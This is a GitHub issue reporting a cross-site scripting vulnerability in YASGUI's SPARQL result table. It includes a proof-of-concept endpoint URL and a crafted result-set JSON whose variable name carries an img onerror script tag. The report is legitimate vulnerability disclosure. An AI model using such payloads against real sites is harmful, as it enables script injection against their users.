Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross-Site Scripting (XSS) vulnerability in YASGUI result set table #221

Open
ktk opened this issue Apr 14, 2023 · 0 comments · May be fixed by #222
Open

Cross-Site Scripting (XSS) vulnerability in YASGUI result set table #221

ktk opened this issue Apr 14, 2023 · 0 comments · May be fixed by #222

Comments

@ktk
Copy link

ktk commented Apr 14, 2023

Same source as in #220

The company has discovered a potential Cross-Site Scripting (XSS) vulnerability in YASGUI. The vulnerability is caused by the way YASGUI handles the SPARQL result set JSON returned by a malicious endpoint URL. Specifically, the SPARQL result set JSON can be abused to execute JavaScript code and trigger an XSS attack on the web application.

To reproduce the vulnerability, the following endpoint URL can be used:

https://rtp7.ch/sparql_poc.php

This endpoint URL contains a payload that includes an unescaped HTML code that can be used to execute JavaScript code and trigger an XSS attack. The payload is as follows:

{"head":{"vars":["subs<img src=x onerror=alert('XSS') >a","pred","obj"]},"results":{"bindings":[{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#label"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#comment"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#range"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#seeAlso"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subPropertyOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Class"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#domain"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#Resource"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}},{"sub":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#subClassOf"},"pred":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#isDefinedBy"},"obj":{"type":"uri","value":"http://www.w3.org/2000/01/rdf-schema#"}}]}}
@tpluscode tpluscode linked a pull request May 1, 2023 that will close this issue
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

1 participant